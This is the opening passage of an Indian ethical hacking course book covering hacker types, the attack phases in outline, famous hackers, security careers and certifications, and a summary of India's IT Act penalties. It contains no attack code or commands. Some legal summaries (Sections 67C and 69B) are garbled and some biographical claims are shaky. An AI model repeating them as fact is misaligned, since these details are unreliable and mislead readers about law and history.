Anda di halaman 1dari 250

Ethical Hacking Reference Guide.

Preface

In Todays World the Cyber Crime is increasing rapidly and the limelight of such situation we can
see in media, news papers and television also. The most comman cyber crimes are email Hacking,
fake profile, data deft, banking frauds, Numeraous websites are getting hacked. To prevent such
attach and provide strong security, we came with the solution through this book. This Book will
give you complete scenario about all ethical concepts of hacking
This is specially written for the people who have no understanding about cyber crime and internet
related frauds. It will help them to understand all offensive technique to prevent from all cyber
attacks. After going through this book people will come to some special skills like vulnerability
assessment, Penetration Testing, Email Security, System and Network Security, Mobile Security etc

Disclaimer
All the contents in this book is only for education purpose only. We dont take any responsibility for
any illegal activity in future . We give credits to FLS team and Reference Material taken from
Internet.
Course Content in Details

1. Introduction To Cyber Security


2. Careers In Cyber Security
3. IT ACT 2000/2008
4. Kali Linux Terminology
5. Information Gethering
6. Scanning and Enumrations
7. Hiding Identity
8. Social Engineering Toolkit
9. Advance Metasploit Exploitation
10. Armitage and Fast Track Exploitation
11. Sniffing
12. System Hacking
13. Virus, Trojans and Keyloggers
14. Website Hacking
15. Data Hiding
16. Wireless Hacking
17. Mobile Hacking
18. Honeypots
19. Buffer Overflow, DOS and DDOS
20. Reverse Engineering
21. Pentest Methodolgy
22. Vulnerability Assement and Penetration Testing
Module 1
Introduction To Cyber Security
Introduction
Cyber-security is headline news and a growing challenge for national and global security, while
computer technology now pervades every aspect of the personal and professional lives of our
graduates. This technology underpins enormous performance improvements but also brings serious
vulnerabilities. The many forms of cyber-threats-such as data theft, surveillance, and system
compromise-have become tools of activism, corporate and state espionage, warfare,
counter-proliferation, and intelligence gathering.
Hacker
Someone who seeks and exploits weaknesses in a computer system or computer network (or) who
makes innovative customizations or combinations of retail electronic and computer equipment (or)
who combines excellence, playfulness, cleverness and exploration in performed activities
Ethical Hacker
An ethical hacker is a computer and network expert who attacks a security system on behalf of its
owners, seeking vulnerabilities that a malicious hacker could exploit. To test a security system,
ethical hackers use the same methods as their less principled counterparts, but report problems
instead of taking advantage of them. Ethical hacking is also known as penetration testing, intrusion
testing and red teaming. An ethical hacker is sometimes called a white hat.

Different Types Of Hacker


White Hat Hackers: These are the good guys, computer security experts who specialize in
penetration testing and other methodologies to ensure that a companys information systems are
secure. These IT security professionals rely on a constantly evolving arsenal of technology to battle
hackers.
Black Hat Hackers: These are the bad guys, who are typically referred to as just plain hackers.
The term is often used specifically for hackers who break into networks or computers, or create
computer viruses. Black hat hackers continue to technologically outpace white hats. They often
manage to find the path of least resistance, whether due to human error or laziness, or with a new
type of attack. Hacking purists often use the term crackers to refer to black hat hackers. Black
hats motivation is generally to get paid.
Script Kiddies: This is a derogatory term for black hat hackers who use borrowed programs to
attack networks and deface websites in an attempt to make names for themselves.
Hacktivists: Some hacker activists are motivated by politics or religion, while others may wish to
expose wrongdoing, or exact revenge, or simply harass their target for their own entertainment.
State Sponsored Hackers: Governments around the globe realize that it serves their military
objectives to be well positioned online. The saying used to be, He who controls the seas controls
the world, and then it was, He who controls the air controls the world. Now its all about
controlling cyberspace. State sponsored hackers have limitless time and funding to target civilians,
corporations, and governments.
Spy Hackers: Corporations hire hackers to infiltrate the competition and steal trade secrets. They
may hack in from the outside or gain employment in order to act as a mole. Spy hackers may use
similar tactics as hacktivists, but their only agenda is to serve their clients goals and get paid.
Cyber Terrorists: These hackers, generally motivated by religious or political beliefs, attempt to
create fear and chaos by disrupting critical infrastructures. Cyber terrorists are by far the most
dangerous, with a wide range of skills and goals. Cyber Terrorists ultimate motivation is to spread
fear, terror and commit murder.
Elite Hacker: As with any society, better than average people are rewarded for their talent and
treated as special. This social status among the hacker underground, the elite (or, according to the
hacker language that eventually devolved into leetspeak, 31337) are the hackers among hackers in
this subculture of sorts. They're the masters of deception that have a solid reputation among their
peers as the cream of the hacker crop.

Skill Profile of a Hacker


Hackers are considered as most intelligent person in Cyber world. They are dynamic and highly
skilled persons. Some of the skills are as under:-
1. Good Computer knowledge including different operating system platform like UNIX, Linux,
windows, mac OS etc.
2. Internet and Internet related terms Protocols like OSI, TCP/IP, servers, website, WAN, LAN etc.
3. Various programming language knowledge like C, C++, PHP, PERL, PYTHON, RUBY etc.
4. Networking and network device knowledge like Switch, Router, Gateway, Firewall etc.
5. Internet savvy with R&D interest so that he/she can upgrade for future

Hacking Methodology
1. Reconnaissance
Reconnaissance is the firstly preparatory phase where an attacker makes a systematic attempt to
locate, gather, identify, and record information about the target of evaluation prior to launching an
attack. It involves network scanning either external or internal without authorization. Here, hackers
use to find out as much information as possible about the victim. There are two categories of
reconnaissance techniques which consist of active and passive reconnaissance.

Passive reconnaissance involves gathering information regarding a potential target without the
targeted individuals or companys knowledge. Passive reconnaissance can be as simple as watching
a building to identify what time employees enter the building and when they leave. However, its
usually done using Internet searches or by Googling an individual or company to gain information.
This process is generally called information gathering methods. Sniffing the network is another
means of passive reconnaissance and can yield useful information such as IP address ranges,
naming conventions, hidden servers or networks, and other available services on the system or
network. Sniffing network traffic is similar to building monitoring: A hacker watches the flow of
data to see what time certain transactions take place and where the traffic is going.

Active reconnaissance involves probing the network to discover individual hosts, IP addresses,
and services on the network. This usually involves more risk of detection than passive
reconnaissance and is sometimes called rattling the doorknobs. Active reconnaissance can give a
hacker an indication of security measures in place, but the process also increases the chance of
being caught or at least raising suspicion. Both Passive and Active reconnaissance can lead to the
discovery of useful information to use in an attack. For example, its usually easy to find the type of
web server and the operating system (OS) version number that a company is using. This
information may enable a hacker to find vulnerability in that OS version and exploit the
vulnerability to gain more access.
2.Scanning

Scanning involves taking the information discovered during reconnaissance and using it to examine
the network. Tools that a hacker may employ during the scanning phase can include dialers, port
scanners, network mappers, sweepers, and vulnerability scanners. Hackers are seeking any
information that can help them perpetrate attack such as computer names, IP addresses and user
accounts.

3.GainingAccess

This is the phase where the real hacking takes place. Vulnerabilities discovered during the
reconnaissance and scanning phase are now exploited to gain access. The method of connection the
hacker uses for an exploit can be local area network (LAN, either wired or wireless), local access to
a PC, the Internet, or offline. Examples include stack-based buffer overflows, denial of service
(DOS), and session hijacking. These topics will be discussed in later posts. Gaining access is known
in the hacker world as owning the system.

4. Maintaining Access

Once a hacker has gained access, they want to keep that access for future exploitation and attacks.
Sometimes, hackers harden the system from other hackers or security personnel by securing their
exclusive access with backdoors, rootkits, and Trojans. Once the hacker owns the system, they can
use it as a base to launch additional attacks. In this case, the owned system is sometimes referred to
as zombie system.
5. Covering Tracks

Once hackers have been able to gain and maintain access, they cover their tracks to avoid detection
by security personnel, to continue to use the owned system, to remove evidence of hacking, or to
avoid legal action. Hackers try to remove all traces of the attack, such as log files or intrusion
detection system (IDS) alarms. Examples of activities during this phase of the attack include
steganography, the use of tunneling protocols, and altering log files. Steganography and use of
tunneling for purposes of hacking will be discussed in later posts.
Top 10 Hackers in the World
1. Gary McKinnon:

USA declared him as the biggest military computer hacker ever. He whacked the security system of
NASA and Pentagon. This made him one of the great black hat hacker celebrities and got his name
into the hacker's community. The nerd is now facing 70 years of imprisonment and is deprived from
accessing internet. He has illegally accessed 97 computers and has caused around $700,000 damage
to the economy.

2. Robert Tappan Morris:

He is the creator of first internet worm ?Morris worm? he was a student at Cornell and from that
where he started writing codes to create worms as he wanted to know how large the internet world
is. But the worm lead to the slow speed of internet and made the systems no longer usable. There
was no ways to know how many computers were affected but the experts alleged that around 6000
machines. He was sent to 3 years imprisonment, 400 hours of community service and was fined
$10,500. At present he is a professor at Massachusetts institute of technology, computer science and
artificial intelligence laboratory. He was the first person prosecuted under the 1986 Computer Fraud
and Abuse Act.

3. Kevin David Mitnick:

The computer security consultant, author and a hacker was accused of many cases. He broke into
the computer of top technology and telecommunications like Nokia, Motorola, Fujitsu Siemens and
sun Microsystems. He termed his activity as ?social engineering? to legalize his acts. He hacked the
Los Angeles bus transfer system to get free rides the biggest hacking was the breaking into the DEC
system to view the VMS source code (open virtual memory system which lead to the clean-up cost
of around $160,000. He also gained the full administration privileges to IBM minicomputers at the
computer learning institute in Los Angeles for a bet.

4. Kevin Poulson:

He is best known for his takeover of the KIIS-FM phone lines, a Los Angeles based radio station.
He was also known as dark Dante. The former black hat hacker is currently a senior editor at wired
news
5. Jonathan James:

He is maestro of all hackers who broke into the server of department of defense in the year 1999
which gave him a nick name c0mrade at the age of 16. He also got into the hacking of NASA.
Stealing softwares of NASA and DoD later put him into big trouble. As he was a minor the
punishment was for for 6 months imprisonment and has to pledge that he won?t be using computers
forever.
6. Adrian Lamo:

The threat analyst and grey hat hacker broke into various high profile computers like New York
Times, yahoo and Microsoft that lead to his arrest in the year 2003. He used his internet connections
at libraries and coffee shops. The black hat hacker was sentenced to six month home confinement
and two years of probation and two years of probation which is expired on January 16, 2007. Now
he a great public speaker and a award winning journalist.
7. Vladimir Levin:

The Russian born Jewish became famous for being involved in an attempt to fraudulent transfer of
$10.7 million through Citibank?s computers. He and his 4 other members with him were involved
in this activity. He used a laptop computer in London, England for the access. He stole the
customers? codes and passwords. He made a transaction of $3.7 million via wires to accounts his
group controlled in United States, Finland, the Netherlands, Germany and Israel. He was arrested in
London airport in March 1995, was convicted upto 3 years in jail. He had to pay Citibank of amount
$240,015.

8. Raphael Gray:

He hacked the computer systems around the world in over six weeks. He was 19 years when he
performed the hacking. His mission was to make a multi- million pound credit card. He published
about 6,500 credit cards as an example of weak security in the consumer websites.
9. The Deceptive Duo:

In the year 2002 two young boys namely Benjamin stark,20 and Robert Lyttle,18 who broke into
government networks, including the U.S. navy, NASA, FAA and Department of Defense (DoD).
They argued that they were merely trying to expose security failures and protect Americans because
of the 9/11 incident. Stark was sentenced to 2 years imprisonment and Lyttle severed 4 months in
prison with 3 years? probation and was fined with an amount of ten thousand dollars each.

10. Michael Calce:

Famously knows as mafia boy in the hackers? world as he was a minor, his name was not disclosed.
A high school student from west island, Quebec who launched service attacks in the year 2000
against the top commercial websites including yahoo!, amazon.com, Dell.Inc, E*trade, E-Bay and
CNN. On September 12, 2001, the Montreal Youth Court sentenced him to 8 months of open
custody, one year probation, a small fine. He was restricted from accessing the internet.
Module 2
Careers In Cyber Security
Why Cyber Security is essential?
The security of computer systems is important to the world for two reasons. The increased role of
Information Technology (IT) and the growth of the e-commerce sector, have made cybersecurity
essential to the economy.cybersecurity is vital to the operation of safety critical systems, such as
emergency response, and to the protection of infrastructure systems, such as the national power
grid.

Different Fields in Cyber Security


Information Security Analyst
Security Management Specialist
Computer Systems Analyst
Software Developer, Applications
Network and Computer Systems Administrator
Software Developer, Systems Software
Computer Systems Engineer/Architect
Auditor
Security Manager
Intelligence Analyst

List of Security Certifications


Knowledge Based Certifying an individuals knowledge and skills
Organisational Based Certifying that an organisation has reached certain standards
Product Based Certifying that a product or system has been accredited at a certain standard
Knowledge Based
Computer Associates
Computer Associates Certified eTrust Specialist (CACES)
CERT/CC
Computer Security Incident Handler (CSIH)
Cisco
Cisco Certified Security Professional (CCSP)
Cisco Advanced Security Field Specialist
Cisco Firewall Specialist
Cisco IPS Specialist
Cisco Security Sales Specialist
Cisco Security Solutions and Design Specialist
Cisco VPN Specialist
Cisco VPN/Security Sales Specialist
Certified Internet Web
CIW Security Analyst
CIW Security Professional
CompTIA
CompTIA Security+
Global Information Assurance Certification (SANS)
GIAC, various
GIAC Security Essentials Certification (GSEC)
GIAC Certified Firewall Analyst (GCFW)
GIAC Certified Intrusion Analyst (GCIA)
GIAC Certified Incident Handler (GCIH)
GIAC Certified Windows Security Administrator (GCWN)
GIAC Certified UNIX Security Administrator (GCUX)
GIAC Information Security Officer (GISO)
GIAC Systems and Network Auditor (GSNA)
GIAC Security Leadership Certificate (GSLC)
GIAC IT Security Audit Essentials (GSAE)
GIAC Gold Standard Certificate (GGSC-0100)
Information Systems Audit and Control Association (ISACA)
Certified Information System Auditor (CISA)
Certified Information Security Manager (CISM)
International Information Systems Security Certification Consortium (ISC2)
Certified Information Systems Security Professional (CISSP)
Systems Security Certified Practitioner (SSCP)
Certification and Accredication Professional
CISSP Concentrations
ISSEP: Information Systems Security Engineering Professional
ISSAP: Information Systems Security Architecture Professional
ISSMP: Information Systems Security Management Professional
International Organisation for Standardisation
ISO 27001:2005- Lead Auditor Course
Microsoft
Microsoft Certified Systems Engineer: Security (MCSE: Security)
EC-Council
Ethical Hacker
Computer Hacking Forensic Investigator
Licensed Penetration Tester
Certified Network Defence Architect
Network Security Administrator
Certified Security Analyst
Certified Secure Programmer and Certified Secure Application Developer
Security 5
Disaster Recovery Institute International
Associate Business Continuity Professional
Certified Functional Continuity Professional
Certified Business Continuity Professional
Master Business Continuity Professional
The International Society of Forensic Computer Examiners
Certified Computer Examiner
Critical Infrastructure Institute
PCIP (Professional in Critical Infrastructure Protection)
Security University
Security University Software Security Engineer Certification
The Association of Certified Fraud Examiners
Certified Fraud Examiner
Ecfirst.com
Certified Security Compliance Specialist
Learning Tree
Network Security Certified Professional
Enterprise and Web Security Certified Professional
High Tech Crime Network
Certified Computer Crime Investigator [Advanced]
Certified Computer Crime Investigator [Basic]
Certified Computer Forensic Technician [Basic]
Certified Computer Forensic Technician [Advanced]
Espionage research Institute
Certified Counterespionage & Information Security Manager
IACIS
Certified Electronic Evidence Collection Specialist Certification
Certified Forensic Computer Examiner Certification
eBusiness Process Solutions
Certified Cyber-Crime Expert (C3E)
Cyber Enforcement Resources Inc.
Basic Internet Investigation
Intermediate Internet Investigation
Advanced Internet Investigation
Cyber Security Institute
CyberSecurity Forensic Analyst (CSFA)
CyberSecurity Institute Certified Instructor (CSICI)
FCPA
Field Certified Security Specialist (FCSS)
Security Certified Program
Security Certified Network Professional (SCNP)
Security Certified Network Architect (SCNA)
Security for Business (S4B)
SCNP Security Certified Network Professional
SCNA Security Certified Network Architect
CWNP
The CWSP (Certified Wireless Security Professional) certification
Symantec
SPS Symantec Product Specialist
STA Symantec Technology Architect
SCSE Symantec Certified Security Engineer
SCSP Symantec Certified Security Practitioner
RSA
RSA Certified Security Professional
RSA SecurID Certified Administrator (RSA SecurID CA)
RSA Certified Instructor (RSA/CI)
RSA Certified Systems Engineer (RSA/CSE)
CyberTrust
TICSA Professional Certification
Checkpoint
Various
Microsoft
MCSE: Security on Microsoft Windows Server 2003
MCSA: Security on Microsoft Windows Server 2003
ITIL Certifications for Individuals
ITIL Foundation Level Certification
ITIL Practioner Level Certification
ITIL Management Level Certification
Technology/Product Certification
VISA
Verified By Visa, Payment Card Industry (PCI) Data Security Standard
WestCoastLabs
Checkmark
American Institute of Certified Public Accountants (AICPA)
SysTrust, WebTrust
BBBOnline
BBBOnline
BITS Financial Services Roundtable
BITS Products Certification (based on CC)
ITSEC JIL (joint interpretation library)
CC (ISO 15408); CCEVS (US),
Eco
Certified Senders Alliance
GeoTrust
Trust Site Seal, Verified Domain, GeoCode
ICSA Labs
ICSA Labs Product Certification
Institute of Electrical and Electronic Engineers (IEEE)
Wireless security standards 802.1x
Internet Engineering Task Force (IETF)
Public-Key Infrastructure Exchange (PKIX), Public Key Cryptography Standards (PKCS)
NSS Labs
NSS Approved, NSS Gold, NSS Tested
McAfee
SiteAdvisor (automatic website rating)
TUV
various
TRUSTe
TRUSTe
VeriSign
VeriSign Secured Seal
Virus Bulletin
VB100% award
International Telecommunication Union (ITU)
X.509
Center for Internet Security
CIS Certified Security Software Products
CyberTrust
Enterprise Certification
Business partner Certification
Application Certification
Perimeter Certification
Organisational Certifications
merican Society for Industrial Security (ASIS)
CPP Certified Protection Professional
Bundesamt fr Sicherheit in der Informationstechnik (BSI)
Grundschutz
Prosoft Learning Corporation
CIW Security Analyst
International Organisation for Standardisation (ISO)
ISO27001, ISO 13335, ISO17799
ISO 20000 IT Service Management Standard (has controls for security and business continuity)
ISO/TR 13569:2005 Financial services Information security guidelines
Information Systems Security Association (ISSA)
Generally Accepted Information Security Principles (GAISP)
International Systems Security Engineering Association (ISSEA)
Systems Security Engineering Capability Maturity Model (SSE-CMM) = ISO 21827
ITIL Security Management
Note that organisations cannot be certified against ITIL as ITIL is not a standard but a Framework
National Institute of Standards and Technology (NIST)
NIST 800-53, NIST 800-40, 800-14
NIST Special Publication 800-37 Guide for the Security Certification and Accreditation of
Federal Information Systems
Security Certified Program
Security Certified Program
Information Security Forum (ISF)
Standard of Good Practice for Information Security
Chartered Accountants of Canada (CICA)
ITCG: Information Technology: Control Guidelines 1998
CESG
ITSEC or Common Criteria formal evaluation and certification
CLAS and the ITPC Qualification
AICPA
Webtrust, Systrust
Short & Long Term Courses In India
Following are the courses Helpful in Building Career in Cyber Security.

Short Term Courses


1. http://www.eccouncil.org

2.http://www.offensive-security.com/information-security-certifications/oscp-offensive-security-cert
ified-professional/

3. http://www.sans.org/

4. http://www.ili.ac.in/e-learn10.htm

5. http://www.asianlaws.org/index.php

6. http://www.ifs.edu.in/course-details

Long Term Course Including PG Programmes and Diploma

1. M.Sc in Cyber Forensics and Information Security

Link:- http://www.unom.ac.in/index.php?route=academic/coursehighlights

2. M.S In Cyber Law and Information Security

Link:- http://ms.iiita.ac.in

3. M.Tech In Cyber Security and Computer Networks

Link:- http://www.amrita.edu/cyber/mtech.html

4. M.Tech in Information Security & Cyber Forensics

Link:- http://www.drmgrdu.ac.in/Engineering/CSECourses/mtechftISCF.htm
5. M.S In Cyber Law and Security

Link:- http://www.imtcdl.ac.in/mscs_about.htm

6. Post Graduate Certificate in Cyber Law (PGCCL)

Link:- http://www.ignou.ac.in/ignou/aboutignou/school/sol/programmes/detail/37/2

7. Some Other Colleges

Link:- http://study.taaza.com/study/list-colleges-in-india-providing-m-tech-cyber-security

Need of Cyber Security Experts :


The numbers are startling: The U.S. Cyber Command seeks 5,000 cybersecurity pros. The federal
government will need 10,000 cybersecurity experts in the near future. Even the Department of
Homeland Security's comparatively small yet urgent demand for 600 new cybersecurity employees
is dizzying once the logistics are considered.
ITWAC identified specific domains requiring more extensive training to better equip IT security
professionals to deal with increasingly pervasive cyberthreats
According to Burning Glass International, Inc., a firm specializing in using technology to match
people and jobs, demand is growing at 12 times that of the overall job market. Between 2007 and
2012 demand for cyber security experts grew 73 percent, while demand for all computer jobs grew
20 percent. Salaries for such experts as engineers, analysts, managers and architects averaged
$101,000. Burning Glass also noted that its not just defense contractors seeking cybersecurity
experts, financial services companies and telecoms are driving demand as they face new threats and
challenges.
Module 3
IT Act 2000/2008
Introduction
"Cyber" is a prefix used to describe a person, thing, or idea as part of the computer and information
age. Taken from kybernetes, Greek word for "steersman" or "governor," it was first used in
cybernetics, a word coined by Norbert Wiener and his colleagues. The virtual world of internet is
known as cyberspace and the laws governing this area are known as Cyber laws and all the netizens
of this space come under the ambit of these laws as it carries a kind of universal jurisdiction. Cyber
law can also be described as that branch of law that deals with legal issues related to use of
inter-networked information technology. In short, cyber law is the law governing computers and the
internet.
The growth of Electronic Commerce has propelled the need for vibrant and effective regulatory
mechanisms which would further strengthen the legal infrastructure, so crucial to the success of
Electronic Commerce. All these regulatory mechanisms and legal infrastructures come within the
domain of Cyber law.
Cyber law is important because it touches almost all aspects of transactions and activities on and
involving the internet, World Wide Web and cyberspace. Every action and reaction in cyberspace
has some legal and cyber legal perspectives.
Cyber law encompasses laws relating to
Cyber crimes
Electronic and digital signatures
Intellectual property
Data protection and privacy

CYBER LAW IN INDIA


In India, cyber laws are contained in the Information Technology Act, 2000 ("IT Act") which came
into force on October 17, 2000. The main purpose of the Act is to provide legal recognition to
electronic commerce and to facilitate filing of electronic records with the Government.
The information Technology Act is an outcome of the resolution dated 30th January 1997 of the
General Assembly of the United Nations, which adopted the Model Law on Electronic Commerce,
adopted the Model Law on Electronic Commerce on International Trade Law. This resolution
recommended, inter alia, that all states give favourable consideration to the said Model Law while
revising enacting new law, so that uniformity may be observed in the laws, of the various
cyber-nations, applicable to alternatives to paper based methods of communication and storage of
information.
The Department of Electronics (DoE) in July 1998 drafted the bill. However, it could only be
introduced in the House on December 16, 1999 (after a gap of almost one and a half years) when
the new IT Ministry was formed. It underwent substantial alteration, with the Commerce Ministry
making suggestions related to e-commerce and matters pertaining to World Trade Organization
(WTO) obligations. The Ministry of Law and Company Affairs then vetted this joint draft.
After its introduction in the House, the bill was referred to the 42-member Parliamentary Standing
Committee following demands from the Members. The Standing Committee made several
suggestions to be incorporated into the bill. However, only those suggestions that were approved by
the Ministry of Information Technology were incorporated. One of the suggestions that was highly
debated upon was that a cyber caf owner must maintain a register to record the names and
addresses of all people visiting his caf and also a list of the websites that they surfed. This
suggestion was made as an attempt to curb cyber crime and to facilitate speedy locating of a cyber
criminal. However, at the same time it was ridiculed, as it would invade upon a net surfers privacy
and would not be economically viable. Finally, this suggestion was dropped by the IT Ministry in its
final draft.
The Union Cabinet approved the bill on May 13, 2000 and on May 17, 2000, both the houses of the
Indian Parliament passed the Information Technology Bill. The Bill received the assent of the
President on 9th June 2000 and came to be known as the Information Technology Act, 2000. The
Act came into force on 17th October 2000.
With the passage of time, as technology developed further and new methods of committing crime
using Internet & computers surfaced, the need was felt to amend the IT Act, 2000 to insert new
kinds of cyber offences and plug in other loopholes that posed hurdles in the effective enforcement
of the IT Act, 2000.
This led to the passage of the Information Technology (Amendment) Act, 2008 which was made
effective from 27 October 2009. The IT (Amendment) Act, 2008 has brought marked changes in the
IT Act, 2000 on several counts.

NATIONAL POLICY ON INFORMATION TECHNOLOGY 2012


The Union Cabinet has recently in September 2012, approved the National Policy on Information
Technology 2012. The Policy aims to leverage Information & Communication Technology (ICT) to
address the countrys economic and developmental challenges.
The vision of the Policy is To strengthen and enhance Indias position as the Global IT hub and to
use IT and cyber space as an engine for rapid, inclusive and substantial growth in the national
economy. The Policy envisages among other objectives, to increase revenues of IT and ITES
Industry from 100 Billion USD at present to 300 Billion USD by 2020 and expand exports from 69
Billion USD at present to 200 Billion USD by 2020. It also aims to create a pool of 10 million
additional skilled manpower in ICT.

The thrust areas of the policy include:


1. To increase revenues of IT and ITES (Information Technology Enabled Services) Industry from
100 Billion USD currently to 300 Billion USD by 2020 and expand exports from 69 Billion USD
currently to 200 Billion USD by 2020.
2. To gain significant global market-share in emerging technologies and Services.
3. To promote innovation and R&D in cutting edge technologies and development of applications
and solutions in areas like localization, location based services, mobile value added services, Cloud
Computing, Social Media and Utility models.
4. To encourage adoption of ICTs in key economic and strategic sectors to improve their
competitiveness and productivity.
5. To provide fiscal benefits to SMEs and Startups for adoption of IT in value creation
6. To create a pool of 10 million additional skilled manpower in ICT.
7. To make at least one individual in every household e-literate.
8. To provide for mandatory delivery of and affordable access to all public services in electronic
mode.
9. To enhance transparency, accountability, efficiency, reliability and decentralization in
Government and in particular, in delivery of public services.
10. To leverage ICT for key Social Sector initiatives like Education, Health, Rural Development and
Financial Services to promote equity and quality.
11. To make India the global hub for development of language technologies, to encourage and
facilitate development of content accessible in all Indian languages and thereby help bridge the
digital divide.
12. To enable access of content and ICT applications by differently-abled people to foster inclusive
development.
13. To leverage ICT for expanding the workforce and enabling life-long learning.
14. To strengthen the Regulatory and Security Framework for ensuring a Secure and legally
compliant Cyberspace ecosystem.
15. To adopt Open standards and promote open source and open technologies
The Policy has however not yet been notified in the Official Gazette.

INFORMATION TECHNOLOGY ACT, 2000


Information Technology Act, 2000 is Indias nodal legislation regulating the use of computers,
computer systems and computer networks as also data and information in the electronic format.
This legislation has touched varied aspects pertaining to electronic authentication, digital
(electronic) signatures, cyber crimes and liability of network service providers.
The Preamble to the Act states that it aims at providing legal recognition for transactions carried out
by means of electronic data interchange and other means of electronic communication, commonly
referred to as "electronic commerce", which involve the use of alternatives to paper-based methods
of communication and storage of information and aims at facilitating electronic filing of documents
with the Government agencies. This Act was amended by Information Technology Amendment Bill,
2008 which was passed in Lok Sabha on 22nd December, 2008 and in Rajya Sabha on 23rd
December, 2008. It received the assent of the President on 5th February 2009 and was notified with
effect from 27/10/2009.
The IT Act of 2000 was developed to promote the IT industry, regulate ecommerce, facilitate
e-governance and prevent cybercrime. The Act also sought to foster security practices within India
that would serve the country in a global context. The Amendment was created to address issues that
the original bill failed to cover and to accommodate further development of IT and related security
concerns since the original law was passed.
The IT Act, 2000 consists of 90 sections spread over 13 chapters [Sections 91, 92, 93 and 94 of the
principal Act were omitted by the Information Technology (Amendment) Act 2008 and has 2
schedules.[ Schedules III and IV were omitted by the Information Technology (Amendment) Act
2008].

Rules notified under the Information Technology Act, 2000


a) The Information Technology (Reasonable security practices and procedures and sensitive
personal data or information) Rules, 2011
b) The Information Technology (Electronic Service Delivery) Rules, 2011
c) The Information Technology (Intermediaries guidelines) Rules, 2011
d) The Information Technology (Guidelines for Cyber Cafe) Rules, 2011
e) The Cyber Appellate Tribunal (Salary, Allowances and other terms and conditions of service of
Chairperson and Members) Rules, 2009
f) The Cyber Appellate Tribunal (Procedure for investigation of Misbehaviour or Incapacity of
Chairperson and Members) Rules, 2009
g) The Information Technology (Procedure and Safeguards for Blocking for Access of Information
by Public), 2009
h) The Information Technology (Procedure and Safeguards for interception, monitoring and
decryption of information) Rules, 2009
i) The Information Technology (Procedure and Safeguard for Monitoring and Collecting Traffic
Data or Information) Rules, 2009
j) The Information Technology (Use of electronic records and digital signatures) Rules, 2004
k) The Information Technology (Security Procedure) Rules, 2004
l) The Information Technology (Other Standards) Rules, 2003
m) The Information Technology (Certifying Authority) Regulations, 2001
n) Information Technology (Certifying Authorities) Rules, 2000

Brief Overview of the Information Technology Act, 2000


The Information Technology Act was enacted with a view to give a fillip to the growth of electronic
based transactions, to provide legal recognition for e-commerce and e-transactions, to facilitate
e-governance, to prevent computer based crimes and ensure security practices and procedures in the
context of widest possible use of information technology worldwide.

Applicability of the Act


The Act will apply to the whole of India unless otherwise mentioned. It applies also to any offence
or contravention there under committed outside India by any person.
The Act shall not apply to the following documents or transactions
A negotiable instrument as defined in Sec.13 of the Negotiable Instruments Act, 1881;
A power of attorney as defined in Sec.1A of the Powers of Attorney Act, 1882;
A trust as defined in Section 3 of the Indian Trusts Act, 1882;
A Will as defined in Sec.2(h) of the Indian Succession Act, 1925 including any other testamentary
disposition by whatever name called;
Any contract for the sale or conveyance of immovable property or any interest in such property.

Scheme of the Act


- Chapter I Preliminary
- Chapter II Digital Signature and Electronic Signature (Sections 3 & 3A)
- Chapter III Electronic Governance (Sections 4 to 10A)
- Chapter IV Attribution, Acknowledgement and Dispatch of Electronic Records (Sections 11 to
13)
- Chapter V Secure electronic records and secure electronic signatures (Sections 14 to 16)
- Chapter VI Regulation of Certifying Authorities (Sections 17 to 34)
- Chapter VII Electronic Signature Certificates (Sections 35 to 39)
- Chapter VIII Duties of Subscribers (Sections 40 to 42)
- Chapter IX Penalties, Compensation and Adjudication (Sections 43 to 47)
- Chapter X The Cyber Appellate Tribunal (Sections 48 to 64)
- Chapter XI Offences (Sections 65 to 78)
- Chapter XII Intermediaries not to be liable in certain cases (Section 79)
- Chapter XIIA Examiner of Electronic Evidence (Section 79A)
- Chapter XIII Miscellaneous (Sections 80 to 90)
First Schedule Documents or Transactions to which the Act shall not apply
Second Schedule Electronic signature or Electronic authentication technique or procedure

Offences and Penalties under IT ACT 2000


1. Section 65
Offence: Tampering with Data
Penalty: - Three Years Punishment or Two Lakh rupees charge or both
2. Section 66E
Offence: - Privacy Violation of any person
Penalty: - Three Years Punishment or Two Lakh rupees charge or both
3. Section 66F
Offence: - Cyber Terrorism- System Hacking using Virus, Trojans, Malwares etc., damaging
property of a person or death etc.
Penalty: - Punishment is Life Imprisonment
4. Section 67B
Offence: - Child pornography
Penalty: - Five Years Punishment or Ten Lakh rupee charge. If it is creating more violation then
years may exceed to seven and fine will be same.
5. Section 67C
Offence: - Intermediary like ISP, Telecommunication companies, cyber cafe etc., has to maintain
record of such Data, if they are not maintaining at least for 1 year. They will be considered as victim
for distributed such sexual content.
Penalty: - Three Years Punishment or fine.
6. Section 69A
Central Govt. or any of its officers has Power to issue directions for blocking any information to
intermediary like ISP, Telecommunication companies, cyber cafe etc.
Offence: - If intermediary fails to block such content.
Penalty: - Seven years imprisonment and fine.
7. Section 69B
Central Govt. has power to monitor and collect traffic data or information through any computer
resource for cyber security.
Offence: - If authorized agencies fail to do such.
Penalty: - three years imprisonment and fine.
8. Section 70B
ICERT (Indian Computer Emergency Response Team) to serve as national agencies for incident
response
Offence: - Any service provider, intermediaries, data centres, body corporate or person who fails to
provide information called by ICERT.
Penalty: - 1 years imprisonment or 1 Lakh rupees or both.
9. Section 71
Offence: - False statement regarding any material, controller and Certifying Authority.
Penalty: - 2 years imprisonment or 1 Lakh rupees or both.
10. Section 72
Offence: - Breach of confidentiality or Privacy.
Penalty: - 2 years imprisonment or 1 Lakh rupees or both.
11. Section 73
Offence: - Publishing Electronic Signature Certificates false in certain particulars.
Penalty: - 2 years imprisonment or 1 Lakh rupees or both.
12. Section 74
Offence: - Publication for fraudulent purpose
Penalty: - 2 years imprisonment or 1 Lakh rupees or both.
13. Section 75
Offence: - Contraventions committed outside India.
14. Section 76
Offence: - Confiscation
Any computer, computer system, floppies, compact disks, tape drives or any other accessories
related thereto, in respect of which any provision of this Act, rules, orders or regulations made there
under has been or is being contravened, shall be liable to confiscation
15. Section 77A
Offences: - Compounding of offences.
The person accused of an offence under this act may file an application for compounding in the
court in which offence is pending for trial and the provisions of section 265 B and 265 C of Code of
Criminal Procedures, 1973 shall apply.
16. Section 77B
Offences: - Offences with three years imprisonment to be cognizable
Penalty: - Notwithstanding anything contained in Criminal Procedure Code 1973, the offence
punishable with imprisonment of three years and above shall be cognizable and the offence
punishable with imprisonment of three years shall be bail able
IT ACT 2008
Known as ITAA, 2008 was passed by the parliament on December 23, 2008 in 26 minutes. It
focuses mainly on Section 67, Section 69, Section 69A and Section 69B. New amendment was
brought in changes in section 43 of IT act 2000 and the penalty may increase to 1 Crore. Section 66
has been amended for increasing the punishment up to three or five years. Section 69A and Section
69B are added.
Following are the changes in IT ACT 2008 with updated penalties and offences.
